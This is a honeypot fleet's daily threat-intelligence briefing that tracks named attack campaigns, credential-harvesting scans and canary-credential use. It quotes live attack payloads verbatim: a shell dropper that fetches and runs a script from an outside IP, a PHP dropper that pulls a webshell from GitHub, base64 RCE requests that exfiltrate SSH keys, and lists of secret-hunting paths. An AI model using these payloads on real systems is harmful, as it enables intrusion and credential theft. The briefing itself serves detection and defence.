FLUX FLEET — INTEL BRIEFING №15
Period: 2026-09-09 07:36 – 2026-09-10 07:36 UTC (24h digest window, day 14 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 14-day baseline, every result-tag spike attributed by spot query)
The digest window starts at the previous digest run time. Events from 03:36 to 07:36 UTC on 09-09 appear in both this digest and №14's data. The true new window starts at 07:36 UTC on 09-09. All times are UTC and quoted from the raw log timestamps. №14's tail (136.70.70.191's control runner at 03:53, 41.140.11.235's NIGHTAGENT run at 06:32, 213.209.159.154's control census at 04:47, and the 94.154.43.x pool probes) is overlap and is not recounted as new. control-1's log sync failed this cycle (node unreachable over SSH), so its digest numbers rest on the last synced data; every control-1 figure in this report is cross-checked against
v_fulland unaffected.
BLUF
The OMEGA-SWEEP single-minute census template escaped its /46 block: two new operators ran it in one window — 94.154.46.242 (Omegatech, US) hit control with 1,050 events, 1,042 paths, and 6 mints, and 176.65.144.71 (Dedik Services, CH) hit aidev with 639 events and 4 mints, both under a forged Googlebot/2.1 UA and the same 107-trap-family inventory. METADATA-HUNT ran a fifth runner day but sent only one runner (34.6.12.67, farm, 25 mints, 444 forged crawler UAs). The Tracebit funnel went silent: fleet minted 67 credentials to 29 collectors and not one reached AWS, the first zero-use window since use tracking began. NIGHTAGENT returned on a sixth ONP Morocco residential IP (160.178.89.73), ran the full kit on both EU nodes, minted 1, and its GHSAT dropper token is still unrotated in the eighth window. LIBREDTAIL-KIT ran a second consecutive window (8 IPs, all 3 nodes) and its dropper self-identifies as cve_2024_4577.selfrep.
Key Judgements
- The OMEGA-SWEEP census template is now multi-tenant. 94.154.46.242 ran 1,050 events across 1,042 paths and 107 trap families on control in 16 seconds (16:38–16:39 UTC) and minted 6 at
/.env. 176.65.144.71 ran 639 events across 634 paths and 88 trap families on aidev in 14 seconds (21:55–21:56 UTC) and minted 4. Both used the forgedGooglebot/2.1UA, and the result profiles match №12's 94.154.46.247 record (2,100 events, 1,042 paths, 107 families) family for family. Two different hosting blocks (Omegatech US, Dedik Services CH) ran one shared wordlist inside 5 hours. (High confidence — per-IP result inventories compared by spot query; the 107-family match and the Googlebot/2.1 UA are exact, and neither IP appeared in any prior window) - The canary funnel produced zero AWS use for the first time in the tracking record. The window minted 67 credentials to 29 collectors; Tracebit recorded 0 uses. The persistent-collector table shows the known hoards unchanged (94.154.46.243 at 31, 94.154.46.247 at 18, 94.154.46.248 at 10), and 159.26.110.179 — the actor that ran
GetCallerIdentityin №14 — minted nothing and its credentials dropped out of the 6-day mint history with no recorded use. Stolen inventory now stands at a high-water mark with no observed consumption. (High confidence — Tracebit alert pull covers the window client-side; the 0 count is not a window-split artifact because the mint dates in the funnel all precede the window end) - NIGHTAGENT is a standing rotation, not a burst. 160.178.89.73 (Office National des Postes, MA) ran the full kit at 23:00–23:34 UTC: phpunit verify
<?php echo "NightAgent";?>on aidev, the unrotated dropper fromraw.githubusercontent.com/nightagents/nightshell(GHSAT token, byte-identical across all 8 observed rows), form loginuser=root&pass=wrong, and wp-batch multiplex, on both EU nodes 10 minutes apart. This is the sixth residential MA IP and the first return after №14's idle window. (High confidence — journey and bodies quoted fromv_full; the ONP ASN matches all five prior actors' IPs) - LIBREDTAIL-KIT labeled its own payload. The dropper body decoded this cycle ends
sh -s cve_2024_4577.selfrep— the operator names CVE-2024-4577 (phpunit CGI RCE) and marks the payload self-replicating. Seven fresh IPs plus №14's 31.132.90.3 ran the same ~49-event chain on all 3 nodes, one run each, with the ed25519-key exfil body present 32 times. (High confidence — base64 bodies decoded frombodyPreview; theselfreptag is new this window and absent from №14's captured bodies)
Active Campaigns (day 14 status)
Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.
⟳ METADATA-HUNT (GCP Vite/IMDS template, forged crawler UAs) — hostile, fifth runner day, single runner
- Actors: 34.6.12.67 (Google LLC, NL) on farm, 09:09–09:10 UTC: 839 events, 609 paths, 137 trap families, 12 POSTs, 25 mints at
/.env, 444 distinct UAs. №14's control runner 136.70.70.191 (03:53 UTC on 09-09) is window overlap and is not recounted. Aidev and control drew no runner this cycle — the first single-runner window since №13. - TTPs: The absorbed template is unchanged:
/__aws_leak_probe_<hex>__,/@fs/proc/self/environ,/@fs/root/.aws/credentials,/.azure/credentials,/proc/self/environ, actuator families, SQL dumps, and/..;/Tomcat bypasses. The crawler-UA rotation held at 444 distinct strings (№14 range: 448–461), still mixing forgedGPTBot,Claude-User,PerplexityBot,GrokBot, and mobile-browser composites. - Assessment: One runner per window is now the observed cadence floor. The runner minted 25 and Tracebit saw no use — the mint-to-use funnel stayed closed for this campaign after two open cycles. The farm hit also produced the
docker-registry-tagsanddocker-registry-manifestresult spikes (90 each vs 7-day 30), but spot queries attribute those to the LeakIX wave below, not to the runner.
⟳ OMEGA-SWEEP (Omegatech /46 census template, forged Googlebot/2.1) — hostile, template escaped the block
- Actors: 94.154.46.242 (Omegatech LTD, US) on control, first appearance: 1,050 events, 16:38:45–16:39:01 UTC, 6 mints. 176.65.144.71 (Dedik Services Limited, CH) on aidev, first appearance: 639 events, 21:55–21:56 UTC, 4 mints. The №14 census operator 94.154.46.248 did not run. The /46 hoard roster stands at .243 (31 creds), .247 (18), .248 (10), .244 (12), .249 (12), all zero-use.
- TTPs: Single-minute census, one forged
Googlebot/2.1UA,/.envmint paths inside the run. 94.154.46.242's inventory covers 107 trap families includingwp-config,fake-git,k8s-secret-manifest,kubeconfig,terraform-tfstate, andwebshell-probe— the №12 template path for path. - Assessment: A second hosting block now runs the same census wordlist. Either the template was shared, sold, or the Dedik run is the same crew on new infrastructure. The three /46-block hoards remain unused; .242 and .71 join the watch list as fresh 6- and 4-credential holders. A third operator running this wordlist would make it a commodity template.
⟳ REGISTRY-HUNT (LeakIX weblogic→docker-registry walk) — borderline scanner, fleet-wide wave, 23 mints
- Actors: 24
l9scanIPs this window, all DigitalOcean, on farm and aidev: 167.71.81.114 (119 events), 164.90.208.56 (82), 164.92.244.132 (82), 206.189.95.232 (82), 138.68.144.227 (82), and 19 more at 39–41 events each. Two UA variants (l9scan/2.0.632323…on aidev,l9scan/2.0.234313…on farm). The docker-registry stage alone drew 43 farm IPs and 858 events — the cause of the farmdocker-registry-*3.0× spikes. - TTPs: The 15-step template: tarpit probe → WebLogic console → server-status → Confluence → WHM/cPanel subdomain proxies →
/v2/_catalog→/v2/internal/api-gateway/tags/list→/v2/internal/api-gateway/manifests/latest. New this cycle: 6POST /graphqlintrospection requests (3 syntax-error), including agraphql-credential-canarytrap hit — the walk now probes GraphQL surfaces. One mint per IP on most runners; 23 mints total. - Assessment: LeakIX collected 1 mint per IP, the same shallow shape as №9–№12. The fleet held: the docker-registry stages returned fake manifests, and the GraphQL probe hit a credential canary, not a real endpoint. Report as a public leak-scanning service, distinct from criminal actors, but note the new GraphQL probe family — it will mint on any fleet node that ships an AI-graphql surface.
⟳ NIGHTAGENT (residential MA, phpunit dropper kit) — hostile, returned after 1 idle window, sixth IP
- Actors: 160.178.89.73 (ONP, MA): aidev 23:00–23:34 UTC (188 events, 46 paths), farm 23:10–23:23 UTC (174 events, 45 paths), 1 mint on aidev at 23:02, 6 mint-failure 400s across the two nodes. №14's 41.140.11.235 (06:32–06:45 UTC on 09-08) is overlap.
- TTPs: Unchanged, observed again:
<?php echo "NightAgent";?>check, dropper<?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>,/whm+/openid_connect/cpanelidprobes,user=root&pass=wronglogin, wp-batch{"requests": [...]}multiplex (735-byte body), then a config-bundle JS walk with/..;/bypasses. - Assessment: Six ONP IPs in eight windows, the same GitHub token since №9. The kit is the actor; IPs rotate inside one Moroccan ISP. The minted credential shows no AWS use. The token is now an 8-window fingerprint and still unrotated — the cheapest takedown lever the fleet has observed.
⟳ LIBREDTAIL-KIT (phpunit RCE + key exfil + shell dropper) — hostile, second window, self-rep tag added
- Actors: 8 IPs on all 3 nodes, one run each, ~49 events in 13–120 seconds: 185.151.146.160 (farm, 22:42), 45.43.60.98 (farm, 17:24), 178.132.198.203 (farm, 15:41), 186.182.105.49 (farm, 23:00), 2.26.64.195 (control, 09:36), 23.88.108.246 (aidev, 07:01 on 09-10), 43.165.170.19 (aidev, 17:54), plus №14's 31.132.90.3 (farm, 10:29, 3 events). ASNs span residential and hosting; no concentration.
- TTPs: Chain unchanged:
md5("Hello PHPUnit")probe acrosseval-stdin.phppermutations,shell_exec(base64_decode(...))POST that echoes an OpenSSH ed25519 private key (32 captured bodies), thenPOST /bin/sh. The dropper body, verbatim after decode:(wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s cve_2024_4577.selfrep. Theselfrepargument and the CVE label are new. - Assessment: The kit runs on schedule against all nodes and still wants execution, not credentials — 0 mints. The staging host 217.60.195.113 is unchanged across both windows. The
selfreptag claims worm behavior; the fleet saw no evidence of self-propagation in the logs, so treat the claim as unverified and watch for the kit appearing from an IP that a prior run touched.
⟳ MALWARE-DICT (dropper-URL dictionary loop) — hostile, continuous, /24 grew a fourth host
- Actors: 204.76.203.18 on control for the full true window (1,968 events, 575 paths, all GETs, 0 mints, blocklist ipsum:2), a continuous loop again after №14's 26-hour run. New sibling 204.76.203.50: 7 events, 1 path, 1 event per node across all 3 nodes (17:12–20:38 UTC) — a fourth host in the Pfcloud /24. .10 and .7 did not return.
- TTPs: The replay dictionary held the №14 families (
/kitty.*,/lol.*,/bot.*,/whoareyou,/bins/morte.*,/hiddenbin/boatnet.*). No adminer or actuator probes this cycle. - Assessment: The loop is now a standing background process on control, two windows running. The /24 roster is four hosts with three distinct behaviors (replay loop, adminer probe, single-path touch). The 07:36 sync failure on control-1 makes this cycle's loop count a floor, not a ceiling.
⟳ CREDSWEEP (Feo Prest promotion) — hostile, promoted from standing actor
- Actors: 213.209.159.154 (Feo Prest SRL, DE) ran a second census-class run in a second window: farm, 23:15:02–23:15:08 UTC, 171 events, 169 paths, 6 seconds, forged MSIE-9
MALNJSUA, 0 mints. №14's control run (04:47 UTC on 09-09) is overlap. The /24's second operator, 213.209.159.175, did not return. - TTPs: Same census as №14:
.env-variant walk plus the two webshell-sweep paths (/config.inc.php,/config.dev.php) and/.bashrc. Result profile: 119 tarpit, 26env-production-error, 2webshell-sweep-observed. - Assessment: The №14 promotion trigger (a repeat at census size on a second node) fired. The Feo Prest /24 now has two census-class operators across two windows and joins CREDSWEEP as an operator pool. Watch for a third run and for the MSIE-9 UA on other IPs.
⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, grew but below alarm
- Actors: 149 credential POSTs in the true window (farm 108 pairs from 82 IPs, aidev 41 pairs from 39 IPs), distinct bodies, forged browser UAs, whole-window spread.
- Assessment: Volume moved 100 → 149 pairs across the last two true windows. The 200-pair growth alarm stays armed. No mints. Background noise.
Standing actors (persistence check)
- 80.94.95.211 (SS-Net, RO) — eighth window in nine: aidev, 51 events, 49 paths, 1 mint at 14:34 UTC, MSIE 9 and Mail.RU_Bot UAs. 7 all-time mints, zero observed use.
- 16.5.0.236 (
Hello WorldUA) — SOHO-router probes on all 3 nodes, 26 events,username=admin&psd=FeefifofumPOSTs verified in the window body capture. The Firefox/77 variant 85.11.167.199 also returned (3 events, aidev). Benign-shape. - 89.248.172.33 / 93.174.93.12 — uptime-prober set, unchanged: 54 events per node for
.33, 63 on control for 93.174.93.12,/-only. Benign-shape. - 193.32.204.199 — returned after 5 idle days (last seen 09-04): 134 events, control 81 + farm 53, 131
fake-gitresults on/cms/.git/config-class paths, 7 forged UAs. A git-config walker seen on all 3 nodes since 09-01; unattributed, watch. - New unattributed collectors: 64.49.8.54 (138 events,
/.environment*fanout 18 hits each, 13 forged Chrome/Firefox/Edge/iPhone UAs, 2 mints), 132.196.6.75 (59 events, 51 paths in 33 s, 13 UAs, 1 mint), 182.8.249.108 (python-requests/2.32.4, 1 mint on each EU node at 04:38–04:39 UTC on 09-10), 198.23.174.202 (control return: 27 paths in 11 s, forged Chrome/67, 1 mint — the №14-error-wall actor minted this time). - Absent this window: 45.148.10.238 (second consecutive), 91.245.74.31 (second), 34.104.212.213, 94.154.46.248 (no new census), 35.233.85.98 (XMLRPC-BRUTE operator, silent again), 159.26.110.179, 167.99.79.44, the 147.90.209.x and 155.117.232.31 one-mint collectors, and 204.76.203.10/.7.
Benign / research (not hostile)
getdomaindata/1.0(+https://getdomaindata.net) — new honest UA, 2 IPs (34.201.152.181 GCP US, 98.86.175.9 AWS us-east): 36 events each,/and/robots.txtonly, tarpit only, no credential paths, no mints. Honest UA, shallow. Add to the benign list.- Censys (66.132.172.188) — 3 events, owns control's
/cttvd0gtdq4zcsz3random path. Censys also owns the 03:15 first-seen inventory cluster on farm (the/.git/refs/...prefix paths). - 18.116.101.220 (
visionheight.com/scan) — third consecutive window: 2-path sweep on farm, 19 events. - No hostile journeys from Palo Alto, zgrab, OAI-SearchBot, ModatScanner, or ivre-masscan this window.
Canary credentials
Summary
No canary credentials were used in AWS during the window. Fleet sensors minted 67 credentials to 29 collector IPs; none reached AWS.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 67 |
| Distinct collector IPs | 29 |
| Credentials used in AWS (alerts) | 0 |
| Credentials stolen, no observed AWS use in window | 67 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
34.6.12.67 |
canary-farm-1 | 25 | 0 | 0 | — | 25 mints since 2026-09-09 09:09 |
94.154.46.242 |
control-1 | 6 | 0 | 0 | — | 6 mints since 2026-09-09 16:38 |
176.65.144.71 |
ai-devbox-1 | 4 | 0 | 0 | — | 4 mints since 2026-09-09 21:56 |
138.68.144.227 |
ai-devbox-1 | 2 | 0 | 0 | — | 2 mints since 2026-09-09 14:27 |
164.90.208.56 |
canary-farm-1 | 2 | 0 | 0 | — | 2 mints since 2026-09-09 18:18 |
164.92.244.132 |
ai-devbox-1 | 2 | 0 | 0 | — | 3 mints since 2026-09-03 20:42 |
206.189.95.232 |
canary-farm-1 | 2 | 0 | 0 | — | 3 mints since 2026-09-04 20:32 |
64.49.8.54 |
ai-devbox-1 | 2 | 0 | 0 | — | 2 mints since 2026-09-09 13:56 |
102.220.161.87 |
canary-farm-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-07 23:07 |
132.196.6.75 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 08:36 |
134.209.25.199 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 19:54 |
138.197.191.87 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-06 20:30 |
139.59.136.184 |
ai-devbox-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-05 20:41 |
139.59.143.102 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 21:48 |
143.244.168.161 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-05 20:29 |
157.245.36.108 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-04 20:23 |
160.178.89.73 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 23:02 |
167.71.81.114 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 22:04 |
167.99.181.249 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 22:02 |
182.8.249.108 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-10 04:38 |
182.8.249.108 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-10 04:38 |
198.23.174.202 |
control-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-10 03:19 |
206.189.19.19 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 22:06 |
207.154.212.47 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-03 20:33 |
209.97.180.8 |
ai-devbox-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-05 20:42 |
46.101.111.185 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 21:44 |
64.226.65.160 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-09 14:16 |
64.227.70.2 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-06 20:29 |
68.183.9.16 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-06 20:17 |
80.94.95.211 |
ai-devbox-1 | 1 | 0 | 0 | — | 7 mints since 2026-09-04 02:01 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
94.154.46.243: 31 mints, 2026-09-03 19:55 → 2026-09-04 03:42104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25136.67.37.69: 25 mints, 2026-09-08 19:55 → 2026-09-08 19:5534.22.137.199: 25 mints, 2026-09-07 17:26 → 2026-09-07 17:2634.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:0934.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:1035.252.125.133: 25 mints, 2026-09-08 18:51 → 2026-09-08 18:5294.154.46.247: 18 mints, 2026-09-03 17:01 → 2026-09-06 19:02136.85.124.29: 17 mints, 2026-09-07 15:44 → 2026-09-07 15:44207.175.90.192: 13 mints, 2026-09-03 07:50 → 2026-09-03 07:5034.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:30196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:2694.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:4234.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:3545.148.10.238: 11 mints, 2026-09-03 13:30 → 2026-09-07 12:1987.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-06 05:0694.154.46.248: 10 mints, 2026-09-08 07:51 → 2026-09-08 07:51136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:28167.99.79.44: 8 mints, 2026-09-08 19:11 → 2026-09-08 20:2480.94.95.211: 7 mints, 2026-09-04 02:01 → 2026-09-09 14:3491.245.74.31: 7 mints, 2026-09-04 10:52 → 2026-09-06 21:30
Canary-use attribution (briefing prose)
The funnel closed this window. 67 mints went to 29 collectors, and Tracebit recorded zero AWS calls — no Converse chatter, no enumeration, no success. Two explanations fit the data, and the window cannot separate them: the collectors held their credentials (the hoard pattern the /46 block established), or the uses fell outside the Tracebit alert pull. The second explanation has precedent — №14's 159.26.110.179 uses trailed its mint by hours — so treat the zero as "no observed use", not "no use". 159.26.110.179's credentials left the 6-day mint history with no recorded consumption; its №14 GetCallerIdentity success remains the funnel's only non-Converse use and its only success.
Mint concentration shifted. The window's largest mint batch went to a METADATA-HUNT runner (34.6.12.67, 25), but 23 of 67 mints went to the 24 LeakIX IPs at roughly 1 per IP — LeakIX collected from more distinct sources than any single campaign this cycle. 198.23.174.202 broke its №14 pattern: the actor that drew all -error results on aidev minted on control, so the request-shape wall it hit was node-specific or run-specific, not a permanent operator trait.
Fleet Observations
- Canary economics: True-window mints 67 to 29 collectors (farm 41, aidev 19, control 7), all
["aws"]. Digest-window mints 72 (control 11 / aidev 20 / farm 41). All-time: 850 credentials to 240 collector IPs. Mint failures: 22 × 400 in the true window (aidev 11, farm 10, control 1), zero 401s. Failure leaders: 160.178.89.73 (6, the NIGHTAGENT run racing the burst limiter on both nodes) and the LeakIX runners (2–3 each). No new failure shape. - XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — thirteenth consecutive clean day post-fix.
- TLS/attribution posture: Farm served 808 https events on
sso.rightabouteverything.show(2,202 Host-header events on the bare IP, 1,354 on the TLS name), aidev 767 https oninference.fapthropic.com(1,270 Host-header events on the bare IP). Control stayed deliberately certless: 0 https, 5,013 of its 5,026 Host-header events on the bare IP. - Volume: Digest window 11,029 events (farm 3,565 −36% / aidev 2,438 −89% / control 5,026 +51%). The aidev −89% is the absence of CRUSADER-SWEEP's №12 git-mirror class plus no big census until 21:55. Control's +51% is the 204.76.203.18 loop (2,309), the 94.154.46.242 census (1,050), and №14-tail overlap (136.70.70.191's 837). True-window totals: farm 3,548 / aidev 2,440 / control 3,681. Every ≥700-event hour attributed: control 03:00 (875) = 136.70.70.191 №14-tail runner; farm 09:00 (879) = 34.6.12.67 runner; control 16:00 (1,150) = 94.154.46.242 census; aidev 21:00 (756) = 176.65.144.71 census + LeakIX evening wave; farm 20:00 (420) = 43.228.157.68 walk; farm 23:00 (439) = 160.178.89.73 + 213.209.159.154.
- Control discovery velocity: Day-14 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → 110 → 78 unique IPs (true window). Volume rose while unique IPs fell for the second window: the loop, the census, and the LIBREDTAIL runs dominate, so per-visitor depth grew again. The fresh-IP differential holds.
- Result-tag spikes: farm
fake-git-error177 vs 7-day 5.0 (35.4×) — 169 events are 43.228.157.68's walk, 8 are LeakIX and NIGHTAGENT touch-frames. farmdocker-registry-tags/manifests90 each vs 30 (3.0×) — the LeakIX wave (43 IPs). All three spikes attributed. - Digest quirks (all re-checked this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast; single-writer DuckDB lock (all spot queries ran sequentially); sync-arrival first-seen stamps; window overlap with №14 cross-checked before counting anything new. New this cycle:
control-1log sync failed (ssh root@100.127.175.34unreachable); the digest completed on last-synced data and the wrapper flagged it. Re-check node reachability before the next run; if the failure repeats, control's window will develop a hole. - Infrastructure: no fleet-side changes this cycle. control-1 sync failure is the one operational exception, noted above.
Gaps / Next Collection
- Why did zero credentials reach AWS? Two candidate explanations — holding and pull-window — need one check each: pull Tracebit alerts for the full mint history of the window's 29 collectors (uses can trail the flux log cutoff), and re-check the 159.26.110.179 credentials outside the flux window. If the next window is also zero-use against a growing mint count, the hoard is compounding and the resale hypothesis strengthens.
- The census template's tenant count. Two blocks ran the OMEGA-SWEEP wordlist this cycle. A third operator (check for the forged
Googlebot/2.1UA plus a ~1,040-path single-minute run) makes it a commodity; diff each new run's inventory against №12's 94.154.46.247 baseline for wordlist drift. - METADATA-HUNT runner count. One runner this window broke a four-window three-runner pattern. A zero-runner window next cycle suggests a pause after 5 runner days; check whether the ORACLE-SWEEP absorbed families stay inside the template.
- LIBREDTAIL
selfrepclaim. The dropper labels itself self-replicating. Cross-check the spark (Arkime) pcaps for connections from fleet-node IPs to 217.60.195.113 or between nodes, and compare the ed25519 key bodies across the 8 runs — a shared key links the operator instance; per-run keys mean a key generator. - control-1 sync recovery. Check node reachability before the next run (
ssh root@100.127.175.34 true). A second failure means a 24-hour blind spot on the differential node and breaks the control-velocity dataset. - 43.228.157.68 (Ghosty Networks, PK). First-seen git-vault walk (169
fake-git-errorevents,/.git/refs/*/.envprefix variants, blocklisted ipsum:2+firehol2). A second run promotes it to a campaign; the/.git/refs/heads/<ref>/.envprefix shape is its fingerprint.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-10.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (160.178.89.73), plus 20 ad-hoc v_full queries (top-talker profiles, spike attribution, NIGHTAGENT body capture, LIBREDTAIL dropper decode, Pfcloud /24 roster, mint roster, standing-actor persistence, WP-LOGIN-BRUTE volume, OMEGA template comparison) and the Tracebit canary-section generator.